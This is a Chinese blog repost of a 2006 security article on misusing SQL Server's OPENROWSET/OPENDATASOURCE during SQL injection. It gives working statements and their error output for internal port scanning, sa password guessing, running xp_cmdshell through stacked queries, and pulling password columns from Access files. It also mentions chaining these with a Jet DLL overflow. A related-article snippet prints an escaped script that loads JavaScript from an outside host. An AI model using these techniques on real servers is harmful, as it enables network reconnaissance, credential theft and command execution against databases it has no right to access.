转:openrowset/opendatasource的其它技巧

最新推荐文章于 2023-10-19 11:22:00 发布
最新推荐文章于 2023-10-19 11:22:00 发布
阅读量561 收藏
点赞数
分类专栏: SQL Server 文章标签: sql server server microsoft 服务器 user access

 转:http://www.xfocus.net/articles/200606/871.html

创建时间:2006-06-14
文章属性:原创
文章提交:HeiGe (hack-520_at_163.com)

openrowset/opendatasource的其它技巧

Author:SuperHei_[At]_ph4nt0m.org
Blog:http://superhei.blogbus.com/
Team:http://www.ph4nt0m.org
Data: 2006-04-16

前言:
     openrowset/opendatasource的应用大家应该很熟悉了,cadt[1]就是利用的openrowset,其实我们利用openrowset/opendatasource还可

以做很多事情。


一、函数原形参考:

OPENROWSET:http://msdn2.microsoft.com/zh-cn/library/ms190312(SQL.90).aspx

OPENROWSET
( { 'provider_name' , { 'datasource' ; 'user_id' ; 'password'
   | 'provider_string' }
      , {   [ catalog. ] [ schema. ] object
       | 'query'
     }
   | BULK 'data_file' ,
       { FORMATFILE = 'format_file_path' [ <bulk_options> ]
       | SINGLE_BLOB | SINGLE_CLOB | SINGLE_NCLOB }
} )

<bulk_options> ::=
   [ , CODEPAGE = { 'ACP' | 'OEM' | 'RAW' | 'code_page' } ]
   [ , ERRORFILE = 'file_name' ]
   [ , FIRSTROW = first_row ]
   [ , LASTROW = last_row ]
   [ , MAXERRORS = maximum_errors ]
   [ , ROWS_PER_BATCH = rows_per_batch ]

OPENDATASOURCE:http://msdn2.microsoft.com/zh-cn/library/ms179856(SQL.90).aspx

OPENDATASOURCE ( provider_name, init_string )

二、具体利用
[下文都以OPENROWSET为例]

A.sqloledb接口利用:

select * from openrowset('sqloledb','server=127.0.0.1,1433;uid=aaa;pwd=aaa','select @@version')

provider_name:sqloledb
datasource:server=127.0.0.1,1433
user_id:uid=aaa
password :pwd=aaa  
query:  select @@version
                      
1.利用参数datasource进行端口(内网)扫描:

a.本地端口扫描:
*.打开端口[是]:
select * from openrowset('sqloledb','server=127.0.0.1,1433;uid=superhei;pwd=','select @@version')
服务器: 消息 18456,级别 14,状态 1,行 1
用户 'superhei' 登录失败。
*.打开端口[否]:
select * from openrowset('sqloledb','server=127.0.0.1,2433;uid=superhei;pwd=','select @@version')
服务器: 消息 17,级别 16,状态 1,行 1
SQL Server does not exist or access denied.

b.内网端口扫描:
*.打开端口[是]:
select * from openrowset('sqloledb','server=169.254.155.7,1433;uid=superhei;pwd=','select @@version')
服务器: 消息 18456,级别 14,状态 1,行 1
用户 'superhei' 登录失败。
*.打开端口[否]:
select * from openrowset('sqloledb','server=169.254.155.8,1433;uid=superhei;pwd=','select @@version')
服务器: 消息 17,级别 16,状态 1,行 1
SQL Server does not exist or access denied.

2.利用user_id/password进行用户密码猜解:
*密码正确
select * from openrowset('sqloledb','server=127.0.0.1,1433;uid=sa;pwd=123456','select @@version')

Microsoft SQL Server  2000 - 8.00.194 (Intel X86)   Aug  6 2000 00:57:48   Copyright (c) 1988-2000 Microsoft Corporation  

Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

*密码错误
select * from openrowset('sqloledb','server=127.0.0.1,1433;uid=sa;pwd=123','select @@version')
服务器: 消息 18456,级别 14,状态 1,行 1
用户 'sa' 登录失败。

3.跨用户执行SQL

如果web当前连接的用户权限太低如public,提高上面的方法破解出sa的其他dbo的密码,那么我们可以通过注射跨用户[权限]执行SQL语句了,

我们先测试下:

select * from openrowset('sqloledb','server=127.0.0.1,1433;uid=sa;pwd=123456','exec master.dbo.xp_cmdshell [dir]')

服务器: 消息 7357,级别 16,状态 2,行 1
未能处理对象 'exec master.dbo.xp_cmdshell [dir]'。OLE DB 提供程序 'sqloledb' 指出该对象中没有任何列。

晕~~, 没有成功:没有列。我们可以利用多语句来突破:

select * from openrowset('sqloledb','server=127.0.0.1,1433;uid=sa;pwd=123456','select user;exec master.dbo.xp_cmdshell

[dir>c:/test.txt]')

返回select user的结果,我们在到c盘看看test.txt存在,exec master.dbo.xp_cmdshell [dir>c:/test.txt]成功执行了。


B.Microsoft OLE DB Provider for Jet等其他接口的利用。

SELECT f_name, f_password FROM OPENROWSET('Microsoft.Jet.OLEDB.4.0', 'D:/lse/Connections/q.mdb';'admin';'',admin)
[ps:mdb没有设置密码是 用户名为admin ,密码为空]

返回数据库D:/lse/Connections/q.mdb、表admin、列f_name, f_password的内容,这样我们可以提高sql注射得到mdb里的一些敏感数据,不过

上面的语句必须要求sa权限。我们还可以结合一些接口漏洞,如msjet40.dll溢出,来执行命令。

还有regwrite结合利用沙盒 再利用select shell()执行。等等。

4.BULK的利用[略...有兴趣的同学可以搞搞]

flyskylf
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用 OpenRowSetOpenDataSource 访问 Excel 97
07-31
在SQL SERVER中直接访问EXCEL 文件。
openrowset/opendatasource的其它技
10-22 373
 HTML Tags and JavaScript tutorialvar encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);
OpenRowSet权限问题解决
Bluesky_Leon的专栏
10-31 4435
 在使用OpenRowSetOpenDataSource的时候,经常会出现消息 7415,级别 16,状态 1,第 1 行已拒绝对 OLE DB 提供程序 Microsoft.Jet.OLEDB.4.0 的特殊访问。必须通过链接服务器来访问此提供程序。这样子的错误网上搜了很多,大多是说用sa登录就可以了,但是,实际应用过程中不太可能给sa的用户使用,这里面就涉及到
数据仓库之抽取数据:openrowset函数带bulk操作符的用法
SQL Server探索
01-30 1977
  在做数据仓库时,最重要的就是ETL的开发,而在ETL开发中的第一步,就是要从原OLTP系统中抽取数据到过渡区中,再对这个过渡区中的数据进行换,最后把经过处理的干净的数据加载到数据仓库中。   目标数据库是sql server,通过openrowset函数带bulk操作符的用法,导入、导出、更新数据。 带bulk操作符的方式相对于其他方式来说,速度更快。 使用方法: 第1种用法: ...
SQL Server访问远程数据库--使用openrowset/opendatasource的方法
蓝星部队的博客
09-15 4874
一、使用openrowset/opendatasource前首先要启用Ad Hoc Distributed Queries,因为这个服务不安全SqlServer默认是关闭的。 SQL Server 阻止了对组件 'Ad Hoc Distributed Queries' 的 STATEMENT'OpenRowset/OpenDatasource'的访问, 因为此组件已作为此服务器安全配置的一部分而被...
收藏的SQLServer技巧
09-11
SQL Server 技巧集 在本篇文章中,我们将探讨一些实用的 SQL Server 技巧,这些技巧可以帮助开发者更好地使用 SQL Server 数据库管理系统。 1. 重置字段序列 在某些情况下,我们需要重置某个字段的序列(从 1 到 ...
sqlserver调用OPENROWSET的方法[参照].pdf
10-12
SQL Server 提供了多种方式来调用 OPENROWSETOPENROWSET 是 SQL Server 中的一种函数,可以用来从其他数据源中读取数据。OPENROWSET 函数可以用来读取OLE DB 或 ODBC 数据源中的数据。 在 SQL Server 中,...
SQL SERVER 与ACCESS、EXCEL的数据
01-21
在Transact-SQL语句中,我们主要使用OpenDataSource函数、OPENROWSET 函数,关于函数的详细说明,请参考SQL联机帮助。利用下述方法,可以十分容易地实现SQL SERVER、ACCESS、EXCEL数据换,详细说明如下: 一、...
SQL SERVER2005下不能使用OpenRowset创建链接服务器的问题
12-19
SQL SERVER2005下不能使用OpenRowset创建链接服务器的问题
OPENROWSETOPENDATASOURCE的用法
Soon
01-08 1138
OPENROWSETOPENDATASOURCE主要用来将excel等数据导入sql数据库中,在sql中也可以直接操作和访问excel里面的数据.--导入excel数据并生成新表:SELECT * INTO biao FROM OPENROWSET(Microsoft.Jet.OLEDB.4.0,Excel 8.0;HDR=YES;Database=e:/book.xls, 
【利用OpenDataSourceOPENROWSET进行分布式查询和数据的导入导出】
飞轩亭
04-17 6697
利用OpenDataSourceOPENROWSET进行分布式查询和数据的导入导出ps:此文自他人资料  OpenDataSource:一:SQL SERVER 和ACESS的数据导入导出1.在SQL SERVER里查询access数据:-- ======================================================SELECT * FRO
SQL SERVER 链接服务器 以及 openrowset
u013400314的博客
10-22 4479
简单来说,通过链接服务器,让访问其它服务器,像跟访问自身数据库一样方便。from [链接服务器][数据库].[所有者].Tabel。
OPENROWSET
热门推荐
亮子的专栏
07-16 1万+
包含访问 OLE DB 数据源中的远程数据所需的全部连接信息。当访问链接服务器中的表时,这种方法是一种替代方法,并且是一种使用 OLE DB 连接并访问远程数据的一次性的临时方法。可以在查询的 FROM 子句中像引用表名那样引用 OPENROWSET 函数。依据 OLE DB 访问接口的功能,还可以将 OPENROWSET 函数引用为 INSERT、UPDATE 或 DELETE 语句的目标表。尽
使用OPENROWSET :在一个数据库中查询另一个数据库的数据
最新发布
jixn的博客
10-19 4万+
使用OPENROWSET函数可以方便地在当前数据库中链接查询另一个数据库的数据。这种方法适用于需要在不同数据库之间传输数据或在查询中引用其他数据库的情况。然而,确保你具有足够的权限和正确的凭据来执行跨数据库查询是非常重要的。在实际使用中,你可以根据具体情况来调整连接参数和查询语句,以满足你的需求。
opendatasource mysql_sqlserver2005 使用OpenRowSet,opendatasource访问远程数据
weixin_39683144的博客
01-20 304
OpenRowSet 1、向Excel查询 方法(1) select * from OpenRowSet('microsoft.jet.oledb.4.0','Excel 8.0;HDR=yes;database=D:\testdata\test01.xls;','select * from [Sheet1$] wheresnamelike ''%l%''') 方法(2) select * fro...
行集函数:OpenRowSet 和 OpenQuery
albh81462的博客
06-03 733
在SQL Server中,行集函数是不确定性的,这意味着,每次调用,返回值不总是相同的。返回值是不确定的,这意味着,对于相同的输入值,不保证每次返回的值都是相同的。对行集函数的每次调用,行集函数都是单独计算。行集函数:OpenRowSet 和 OpenQuery 的行为和Base Table相似: 能够用于From子句,就像行集函数是一个Base Table,从行集函数中获取数据;...
OpenRowSet 范例
iamduo的专栏
06-26 66
insert into MyTable (Id, Name, Content) select '1', 'MyName', cast(BulkColumn as varchar(max)) from OpenRowSet(Bulk N'D:\aaa\bbb.txt', Single_BLOB) as Content
SQL Server 阻止了对组件“Ad Hoc Distributed Queries”的 STATEMENT“OpenRowset/OpenDatasource”的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用“Ad Hoc Distributed Queries”。有关启用“Ad Hoc Distributed Queries”的详细信息,请搜索 SQL Server 联机丛书中的“Ad Hoc Distributed Queries”。
05-25
这个组件允许用户使用 OPENROWSETOPENDATASOURCE 语句来访问远程数据源。要解决这个问题,你需要执行以下步骤: 1. 使用管理员权限登录 SQL Server。 2. 运行以下命令以启用 sp_configure: ``` sp_configure ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值